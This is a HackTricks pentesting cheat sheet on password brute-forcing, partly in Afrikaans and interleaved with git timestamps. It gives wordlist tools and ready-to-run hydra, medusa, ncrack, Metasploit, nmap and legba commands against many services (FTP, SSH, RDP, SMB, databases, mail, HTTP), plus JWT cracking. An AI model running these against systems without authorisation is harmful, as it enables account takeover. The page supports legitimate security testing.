2024-04-07 05:33:57 +00:00
# Brute Force - Spiekbrief
2022-04-28 16:01:33 +00:00
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-04-07 05:33:57 +00:00
Gebruik [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) om maklik en **outomatiese werksvloei** te bou wat aangedryf word deur die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
2024-03-17 16:40:53 +00:00
Kry Toegang Vandag:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2022-04-28 16:01:33 +00:00
< details >
2024-03-17 16:40:53 +00:00
< summary > < strong > Leer AWS hak van nul tot held met< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE (HackTricks AWS Red Team Expert)< / strong > < / a > < strong > !< / strong > < / summary >
2022-04-28 16:01:33 +00:00
2024-02-11 02:07:06 +00:00
Ander maniere om HackTricks te ondersteun:
2023-12-30 10:12:47 +00:00
2024-05-05 22:31:04 +00:00
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE** ](https://github.com/sponsors/carlospolop )!
2024-02-11 02:07:06 +00:00
* Kry die [**amptelike PEASS & HackTricks swag** ](https://peass.creator-spring.com )
2024-03-17 16:40:53 +00:00
* Ontdek [**Die PEASS Familie** ](https://opensea.io/collection/the-peass-family ), ons versameling eksklusiewe [**NFTs** ](https://opensea.io/collection/the-peass-family )
2024-04-07 05:33:57 +00:00
* **Sluit aan by die** 💬 [**Discord groep** ](https://discord.gg/hRep4RUj7f ) of die [**telegram groep** ](https://t.me/peass ) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live** ](https://twitter.com/hacktricks\_live )**.**
2024-05-05 22:31:04 +00:00
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) en [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) github repos.
2022-04-28 16:01:33 +00:00
< / details >
2024-03-17 16:40:53 +00:00
## Standaard Gelde
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
**Soek in Google** vir die standaardgelde van die tegnologie wat gebruik word, of **probeer hierdie skakels** :
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet** ](https://github.com/ihebski/DefaultCreds-cheat-sheet )
* [**http://www.phenoelit.org/dpl/dpl.html** ](http://www.phenoelit.org/dpl/dpl.html )
* [**http://www.vulnerabilityassessment.co.uk/passwordsC.htm** ](http://www.vulnerabilityassessment.co.uk/passwordsC.htm )
* [**https://192-168-1-1ip.mobi/default-router-passwords-list/** ](https://192-168-1-1ip.mobi/default-router-passwords-list/ )
* [**https://datarecovery.com/rd/default-passwords/** ](https://datarecovery.com/rd/default-passwords/ )
* [**https://bizuns.com/default-passwords-list** ](https://bizuns.com/default-passwords-list )
* [**https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv** ](https://github.com/danielmiessler/SecLists/blob/master/Passwords/Default-Credentials/default-passwords.csv )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://www.cirt.net/passwords** ](https://www.cirt.net/passwords )
2021-11-24 15:00:38 +00:00
* [**http://www.passwordsdatabase.com/** ](http://www.passwordsdatabase.com )
2022-04-05 22:24:52 +00:00
* [**https://many-passwords.github.io/** ](https://many-passwords.github.io )
2024-05-05 22:31:04 +00:00
* [**https://theinfocentric.com/** ](https://theinfocentric.com/ )
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
## **Skep jou eie Woordeboeke**
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
Vind soveel moontlik inligting oor die teiken en genereer 'n aangepaste woordeboek. Gereedskappe wat kan help:
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### Crunch
2020-11-30 15:34:43 +00:00
```bash
2020-07-15 15:43:14 +00:00
crunch 4 6 0123456789ABCDEF -o crunch1.txt #From length 4 to 6 using that alphabet
crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha # Only length 4 using charset mixalpha (inside file charset.lst)
@ Lower case alpha characters
, Upper case alpha characters
% Numeric characters
^ Special characters including spac
crunch 6 8 -t ,@@^^%%
```
2022-05-01 13:25:53 +00:00
### Cewl
2020-07-15 15:43:14 +00:00
```bash
cewl example.com -m 5 -w words.txt
```
2022-05-01 13:25:53 +00:00
### [CUPP](https://github.com/Mebus/cupp)
2020-11-03 11:04:12 +00:00
2024-02-11 02:07:06 +00:00
Genereer wagwoorde gebaseer op jou kennis van die slagoffer (name, datums...)
2021-11-24 15:00:38 +00:00
```
2020-11-03 11:04:12 +00:00
python3 cupp.py -h
```
2023-04-15 21:35:06 +00:00
### [Wister](https://github.com/cycurity/wister)
2024-05-05 22:31:04 +00:00
'n Woordelysgeneratorwerktuig wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid bied om verskeie variasies van die gegewe woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
2023-04-15 21:35:06 +00:00
```bash
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
2024-02-11 02:07:06 +00:00
__ _______ _____ _______ ______ _____
\ \ / /_ _|/ ____ |__ __ | ____ | __ \
\ \ /\ / / | | | (___ | | | |__ | |__) |
\ \/ \/ / | | \___ \ | | | __ | | _ /
\ /\ / _| |_ ____ ) | | | | |____| | \ \
\/ \/ |_____|_____/ |_| |______|_| \_\
Version 1.0.3 Cycurity
2023-04-15 21:35:06 +00:00
Generating wordlist...
[########################################] 100%
Generated 67885 lines.
Finished in 0.920s.
```
2022-05-01 13:25:53 +00:00
### [pydictor](https://github.com/LandGrey/pydictor)
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
### Woordelyste
2020-07-15 15:43:14 +00:00
2021-05-31 09:39:02 +00:00
* [**https://github.com/danielmiessler/SecLists** ](https://github.com/danielmiessler/SecLists )
* [**https://github.com/Dormidera/WordList-Compendium** ](https://github.com/Dormidera/WordList-Compendium )
* [**https://github.com/kaonashi-passwords/Kaonashi** ](https://github.com/kaonashi-passwords/Kaonashi )
2023-04-15 21:35:06 +00:00
* [**https://github.com/google/fuzzing/tree/master/dictionaries** ](https://github.com/google/fuzzing/tree/master/dictionaries )
2021-05-31 09:39:02 +00:00
* [**https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm** ](https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm )
2023-04-15 21:35:06 +00:00
* [**https://weakpass.com/wordlist/** ](https://weakpass.com/wordlist/ )
* [**https://wordlists.assetnote.io/** ](https://wordlists.assetnote.io/ )
* [**https://github.com/fssecur3/fuzzlists** ](https://github.com/fssecur3/fuzzlists )
* [**https://hashkiller.io/listmanager** ](https://hashkiller.io/listmanager )
* [**https://github.com/Karanxa/Bug-Bounty-Wordlists** ](https://github.com/Karanxa/Bug-Bounty-Wordlists )
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
< figure > < img src = "../.gitbook/assets/image (48).png" alt = "" > < figcaption > < / figcaption > < / figure >
2022-08-31 22:35:39 +00:00
\
2024-05-05 22:31:04 +00:00
Gebruik [**Trickest** ](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks ) om maklik **werkstrome** te bou en outomatiseer met die wêreld se **mees gevorderde** gemeenskaplike gereedskap.\
2024-03-17 16:40:53 +00:00
Kry Vandaag Toegang:
2022-08-31 22:35:39 +00:00
{% embed url="https://trickest.com/?utm_campaign=hacktrics& utm_medium=banner& utm_source=hacktricks" %}
2024-02-11 02:07:06 +00:00
## Dienste
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:57 +00:00
Gesorteer alfabeties volgens diensnaam.
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
### AFP
2020-07-15 15:43:14 +00:00
```bash
nmap -p 548 --script afp-brute < IP >
msf> use auxiliary/scanner/afp/afp_login
msf> set BLANK_PASSWORDS true
msf> set USER_AS_PASS true
msf> set PASS_FILE < PATH_PASSWDS >
msf> set USER_FILE < PATH_USERS >
msf> run
```
2022-05-01 13:25:53 +00:00
### AJP
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
AJP (Apache JServ Protocol) is a binary protocol that can be used to proxy requests from a web server to a Java application server. It is often used in combination with Apache Tomcat. AJP can be vulnerable to attacks such as brute force, where an attacker tries to guess usernames and passwords to gain unauthorized access.
2020-07-15 15:43:14 +00:00
```bash
nmap --script ajp-brute -p 8009 < IP >
```
2024-02-11 02:07:06 +00:00
## AMQP (ActiveMQ, RabbitMQ, Qpid, JORAM en Solace)
2023-12-26 20:51:20 +00:00
```bash
legba amqp --target localhost:5672 --username admin --password data/passwords.txt [--amql-ssl]
```
2022-05-01 13:25:53 +00:00
### Cassandra
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
Cassandra is 'n hoogs skaleerbare NoSQL databasis wat ontwerp is om groot hoeveelhede data te hanteer deur middel van 'n gedistribueerde stelsel.
2020-07-15 15:43:14 +00:00
```bash
nmap --script cassandra-brute -p 9160 < IP >
2023-12-26 20:51:20 +00:00
# legba ScyllaDB / Apache Casandra
legba scylla --username cassandra --password wordlists/passwords.txt --target localhost:9042
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### CouchDB
2020-07-15 15:43:14 +00:00
2024-04-16 03:24:57 +00:00
#### Brute Force
2024-05-05 22:31:04 +00:00
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to crack weak passwords or gain unauthorized access to a system. In the case of CouchDB, brute force attacks can be attempted to guess the password of a user account and gain access to the database. It is important to use strong and unique passwords to protect against brute force attacks.
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/couchdb/couchdb_login
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
```
2024-02-11 02:07:06 +00:00
### Docker Register
2021-11-24 15:00:38 +00:00
```
2021-01-03 00:43:09 +00:00
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst 10.10.10.10 -s 5000 https-get /v2/
2020-07-17 23:59:16 +00:00
```
2022-05-01 13:25:53 +00:00
### Elasticsearch
2024-04-07 05:33:57 +00:00
```
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
```
### FTP
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt [-t 32] < IP > ftp
ncrack -p 21 --user root -P passwords.txt < IP > [-T 5]
medusa -u root -P 500-worst-passwords.txt -h < IP > -M ftp
2023-12-26 20:51:20 +00:00
legba ftp --username admin --password wordlists/passwords.txt --target localhost:21
2020-07-15 15:43:14 +00:00
```
2024-02-11 02:07:06 +00:00
### HTTP Generiese Brute
2020-07-15 15:43:14 +00:00
2022-05-01 13:25:53 +00:00
#### [**WFuzz**](../pentesting-web/web-tool-wfuzz.md)
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
### HTTP Basiese Verifisering
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst sizzle.htb.local http-get /certsrv/
2022-09-12 15:29:22 +00:00
# Use https-get mode for https
2020-07-15 15:43:14 +00:00
medusa -h < IP > -u < username > -P < passwords.txt > -M http -m DIR:/path/to/auth -T 10
2023-12-26 20:51:20 +00:00
legba http.basic --username admin --password wordlists/passwords.txt --target http://localhost:8888/
```
### HTTP - NTLM
```bash
legba http.ntlm1 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
legba http.ntlm2 --domain example.org --workstation client --username admin --password wordlists/passwords.txt --target https://localhost:8888/
2020-07-15 15:43:14 +00:00
```
2024-05-05 22:31:04 +00:00
### HTTP - Plaas Vorm
2020-07-15 15:43:14 +00:00
```bash
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst domain.htb http-post-form "/path/index.php:name=^USER^& password=^PASS^& enter=Sign+in:Login name or password is incorrect" -V
2022-09-12 15:29:22 +00:00
# Use https-post-form mode for https
2020-07-15 15:43:14 +00:00
```
2024-03-17 16:40:53 +00:00
Vir http**s** moet jy verander van "http-post-form" na "**https-post-form"**
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
### **HTTP - CMS --** (W)ordpress, (J)oomla of (D)rupal of (M)oodle
2020-07-15 15:43:14 +00:00
```bash
cmsmap -f W/J/D/M -u a -p a https://wordpress.com
2023-12-26 20:51:20 +00:00
# Check also https://github.com/evilsocket/legba/wiki/HTTP
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### IMAP
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. When a hacker gains access to a victim's email account, they can use brute force attacks to crack the victim's email password and gain unauthorized access to their emails.
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > imap -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f < IP > imap -V
nmap -sV --script imap-brute -p < PORT > < IP >
2023-12-26 20:51:20 +00:00
legba imap --username user --password data/passwords.txt --target localhost:993
2020-07-15 15:43:14 +00:00
```
2024-03-17 16:40:53 +00:00
### IRC
2024-05-05 22:31:04 +00:00
IRC (Internet Relay Chat) is 'n protokol wat gebruik word vir instandhouding van gesprekke via 'n netwerk. Dit word dikwels gebruik vir kommunikasie tussen hackers en vir die koördinering van aanvalle.
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p < PORT > < IP >
```
2022-05-01 13:25:53 +00:00
### ISCSI
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 < IP >
```
2024-04-16 03:24:57 +00:00
### JWT
2021-03-08 16:25:26 +00:00
```bash
#hashcat
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
#https://github.com/Sjord/jwtcrack
python crackjwt.py eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc /usr/share/wordlists/rockyou.txt
#John
john jwt.txt --wordlist=wordlists.txt --format=HMAC-SHA256
#https://github.com/ticarpi/jwt_tool
python3 jwt_tool.py -d wordlists.txt < JWT token >
#https://github.com/brendan-rius/c-jwt-cracker
./jwtcrack eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc 1234567890 8
#https://github.com/mazen160/jwt-pwn
python3 jwt-cracker.py -jwt eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjoie1widXNlcm5hbWVcIjpcImFkbWluXCIsXCJyb2xlXCI6XCJhZG1pblwifSJ9.8R-KVuXe66y_DXVOVgrEqZEoadjBnpZMNbLGhM8YdAc -w wordlist.txt
#https://github.com/lmammino/jwt-cracker
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWV9.TJVA95OrM7E2cBab30RMHrHDcEfxjoYZgeFONFh7HgQ" "abcdefghijklmnopqrstuwxyz" 6
```
2022-05-01 13:25:53 +00:00
### LDAP
2020-07-15 15:43:14 +00:00
```bash
nmap --script ldap-brute -p 389 < IP >
2023-12-26 20:51:20 +00:00
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords .txt --ldap-domain example.org --single-match
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### MQTT
2022-02-19 19:42:58 +00:00
```
ncrack mqtt://127.0.0.1 --user test – P /root/Desktop/pass.txt -v
2024-02-11 02:07:06 +00:00
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
2022-02-19 19:42:58 +00:00
```
2022-05-01 13:25:53 +00:00
### Mongo
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script mongodb-brute -n -p 27017 < IP >
use auxiliary/scanner/mongodb/mongodb_login
2023-12-26 20:51:20 +00:00
legba mongodb --target localhost:27017 --username root --password data/passwords.txt
```
### MSSQL
2024-04-16 03:24:57 +00:00
#### Brute Force
2024-05-05 22:31:04 +00:00
Brute force attacks against MSSQL servers can be performed using tools such as **Hydra** or **Ncrack** . These tools allow an attacker to systematically check all possible passwords until the correct one is found. It is important to note that brute force attacks can be time-consuming and resource-intensive, so it is recommended to use them as a last resort.
2023-12-26 20:51:20 +00:00
```bash
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### MySQL
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
#### Brute Force
2024-02-11 02:07:06 +00:00
2024-05-05 22:31:04 +00:00
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is often used when other techniques, such as password cracking, fail. It is a time-consuming process but can be effective if the passwords are weak or easily guessable.
#### Brute Force Prevention
2024-04-16 03:24:57 +00:00
2024-05-05 22:31:04 +00:00
To prevent brute force attacks, you can implement measures such as:
2024-04-16 03:24:57 +00:00
2024-05-05 22:31:04 +00:00
- **Limiting login attempts**: By restricting the number of login attempts allowed within a certain time frame, you can make it harder for attackers to guess the correct credentials.
- **Using strong passwords**: Encouraging users to use complex passwords that are difficult to guess can help prevent brute force attacks.
- **Implementing multi-factor authentication (MFA)**: Adding an extra layer of security, such as MFA, can make it even more challenging for attackers to gain unauthorized access.
2024-04-16 03:24:57 +00:00
2024-05-05 22:31:04 +00:00
By implementing these preventive measures, you can significantly reduce the risk of a successful brute force attack on your MySQL database.
2020-07-15 15:43:14 +00:00
```bash
2021-11-21 17:03:07 +00:00
# hydra
2020-07-15 15:43:14 +00:00
hydra -L usernames.txt -P pass.txt < IP > mysql
2021-11-21 17:03:07 +00:00
# msfconsole
2020-07-15 15:43:14 +00:00
msf> use auxiliary/scanner/mysql/mysql_login; set VERBOSE false
2021-11-21 17:03:07 +00:00
# medusa
medusa -h < IP / Host > -u < username > -P < password_list > < -f | to stop medusa on first success attempt > -t < threads > -M mysql
2023-12-26 20:51:20 +00:00
#Legba
legba mysql --username root --password wordlists/passwords.txt --target localhost:3306
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### OracleSQL
2020-07-15 15:43:14 +00:00
```bash
patator oracle_login sid=< SID > host=< IP > user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORT 1521
msf> set SID < SID >
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS < IP >
msf> set RPORTS 1521
msf> set SID < SID >
2022-09-12 15:29:22 +00:00
#for some reason nmap fails sometimes when executing this script
2020-07-15 15:43:14 +00:00
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=< SID > < IP >
2023-12-26 20:51:20 +00:00
legba oracle --target localhost:1521 --oracle-database SYSTEM --username admin --password data/passwords.txt
2020-07-15 15:43:14 +00:00
```
2024-02-11 02:07:06 +00:00
Om **oracle\_login** met **patator** te gebruik, moet jy dit **installeer** :
2020-07-15 15:43:14 +00:00
```bash
pip3 install cx_Oracle --upgrade
```
2024-04-16 03:24:57 +00:00
[Aflyn OracleSQL-hash bruteforce ](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force ) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3** ):
2020-07-15 15:43:14 +00:00
```bash
2024-02-11 02:07:06 +00:00
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### POP
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
### POP
POP (Post Office Protocol) is a standard email protocol used to retrieve emails from a remote server to a local email client. POP operates over port 110.
2024-03-17 16:40:53 +00:00
2024-05-05 22:31:04 +00:00
### POP
POP (Post Office Protocol) is 'n standaard e-posprotokol wat gebruik word om e-posse vanaf 'n afgeleë bediener na 'n plaaslike e-posklient te haal. POP werk oor poort 110.
2020-07-15 15:43:14 +00:00
```bash
hydra -l USERNAME -P /path/to/passwords.txt -f < IP > pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f < IP > pop3 -V
2023-12-26 20:51:20 +00:00
# Insecure
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:110
# SSL
legba pop3 --username admin@example.com --password wordlists/passwords.txt --target localhost:995 --pop3-ssl
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### PostgreSQL
2020-07-15 15:43:14 +00:00
2024-03-17 16:40:53 +00:00
#### Brute Force
2024-02-11 02:07:06 +00:00
2024-05-05 22:31:04 +00:00
Brute force attacks involve trying all possible combinations of a password until the correct one is found. These attacks can be automated using tools like Hydra or Medusa. It is important to use strong and complex passwords to prevent successful brute force attacks.
2020-07-15 15:43:14 +00:00
```bash
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > postgres
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M postgres
ncrack – v – U /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > :5432
patator pgsql_login host=< IP > user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 < IP >
2023-12-26 20:51:20 +00:00
legba pgsql --username admin --password wordlists/passwords.txt --target localhost:5432
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### PPTP
2020-07-15 15:43:14 +00:00
2024-02-11 02:07:06 +00:00
Jy kan die `.deb` pakkie aflaai om te installeer vanaf [https://http.kali.org/pool/main/t/thc-pptp-bruter/ ](https://http.kali.org/pool/main/t/thc-pptp-bruter/ )
2020-07-15 15:43:14 +00:00
```bash
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter – u < Username > < IP >
```
2022-05-01 13:25:53 +00:00
### RDP
2020-07-15 15:43:14 +00:00
```bash
ncrack -vv --user < User > -P pwds.txt rdp://< IP >
hydra -V -f -L < userslist > -P < passwlist > rdp://< IP >
2023-12-26 20:51:20 +00:00
legba rdp --target localhost:3389 --username admin --password data/passwords.txt [--rdp-domain < RDP_DOMAIN > ] [--rdp-ntlm] [--rdp-admin-mode] [--rdp-auto-logon]
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### Redis
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 < IP >
2021-08-27 00:14:28 +00:00
hydra – P /path/pass.txt redis://< IP > :< PORT > # 6379 is the default
2023-12-26 20:51:20 +00:00
legba redis --target localhost:6379 --username admin --password data/passwords.txt [--redis-ssl]
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### Rexec
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
### Rexec
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rexec://< Victim-IP > -v -V
```
2022-05-01 13:25:53 +00:00
### Rlogin
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P < password_file > rlogin://< Victim-IP > -v -V
```
2022-05-01 13:25:53 +00:00
### Rsh
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
Rsh is a simple remote shell client included with most Unix operating systems. It can be used to execute commands on a remote system. It is often used in brute force attacks to try to guess passwords for user accounts on a remote system.
2020-07-15 15:43:14 +00:00
```bash
hydra -L < Username_list > rsh://< Victim_IP > -v -V
```
[http://pentestmonkey.net/tools/misc/rsh-grind ](http://pentestmonkey.net/tools/misc/rsh-grind )
2022-05-01 13:25:53 +00:00
### Rsync
2020-07-15 15:43:14 +00:00
```bash
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 < IP >
```
2022-05-01 13:25:53 +00:00
### RTSP
2020-07-15 15:43:14 +00:00
```bash
hydra -l root -P passwords.txt < IP > rtsp
```
2023-12-26 20:51:20 +00:00
### SFTP
```bash
legba sftp --username admin --password wordlists/passwords.txt --target localhost:22
# Try keys from a folder
legba sftp --username admin --password '@/some/path/*' --ssh-auth-mode key --target localhost:22
```
2024-03-17 16:40:53 +00:00
### SNMP
2020-07-15 15:43:14 +00:00
```bash
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute < target > [--script-args snmp-brute.communitiesdb=< wordlist > ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt < IP >
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
```
2022-05-01 13:25:53 +00:00
### SMB
2020-07-15 15:43:14 +00:00
2024-05-05 22:31:04 +00:00
SMB is 'n protokol wat gebruik word vir die oordrag van lêers tussen rekenaars oor 'n netwerk. Dit kan 'n aanvalsoppervlak skep vir aanvallers om te gebruik vir brute force-aanvalle om wagwoorde te agterhaal.
2020-07-15 15:43:14 +00:00
```bash
nmap --script smb-brute -p 445 < IP >
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
2023-12-26 20:51:20 +00:00
legba smb --target share.company.com --username admin --password data/passwords.txt [--smb-workgroup < SMB_WORKGROUP > ] [--smb-share < SMB_SHARE > ]
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### SMTP
2024-03-29 21:15:52 +00:00
2024-05-05 22:31:04 +00:00
SMTP (Simple Mail Transfer Protocol) is 'n protokol wat gebruik word om e-posse oor 'n netwerk te stuur.
2020-07-15 15:43:14 +00:00
```bash
hydra -l < username > -P /path/to/passwords.txt < IP > smtp -V
hydra -l < username > -P /path/to/passwords.txt -s 587 < IP > -S -v -V #Port 587 for SMTP with SSL
2023-12-26 20:51:20 +00:00
legba smtp --username admin@example.com --password wordlists/passwords.txt --target localhost:25 [--smtp-mechanism < mech > ]
2020-07-15 15:43:14 +00:00
```
2022-05-01 13:25:53 +00:00
### SOCKS
2021-05-13 16:02:48 +00:00
2024-04-16 03:24:57 +00:00
#### Brute Force
2024-05-05 22:31:04 +00:00
Brute force attacks are a common way to gain unauthorized access to a system by trying all possible combinations of usernames and passwords until the correct one is found. This method is often used when other, more sophisticated hacking techniques fail. It is a time-consuming process but can be effective if the target system has weak credentials.
2024-04-16 03:24:57 +00:00
#### Afrikaans Translation
2024-05-05 22:31:04 +00:00
#### Gewelddadige Aanval
2024-04-16 03:24:57 +00:00
2024-05-05 22:31:04 +00:00
Gewelddadige aanvalle is 'n algemene manier om ongemagtigde toegang tot 'n stelsel te verkry deur alle moontlike kombinasies van gebruikersname en wagwoorde te probeer totdat die regte een gevind word. Hierdie metode word dikwels gebruik wanneer ander, meer gesofistikeerde hak tegnieke faal. Dit is 'n tydrowende proses, maar kan effektief wees as die teikensisteem swak geloofsbriewe het.
2021-05-13 16:02:48 +00:00
```bash
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 < IP >
2023-12-26 20:51:20 +00:00
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt
# With alternative address
legba socks5 --target localhost:1080 --username admin --password data/passwords.txt --socks5-address 'internal.company.com' --socks5-port 8080
```
2024-05-05 22:31:04 +00:00
### SQL-bediener
2023-12-26 20:51:20 +00:00
```bash
#Use the NetBIOS name of the machine as domain
crackmapexec mssql < IP > -d < Domain Name > -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt – P /root/Desktop/pass.txt < IP > mssql
medusa -h < IP > – U /root/Desktop/user.txt – P /root/Desktop/pass.txt – M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts < host > #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
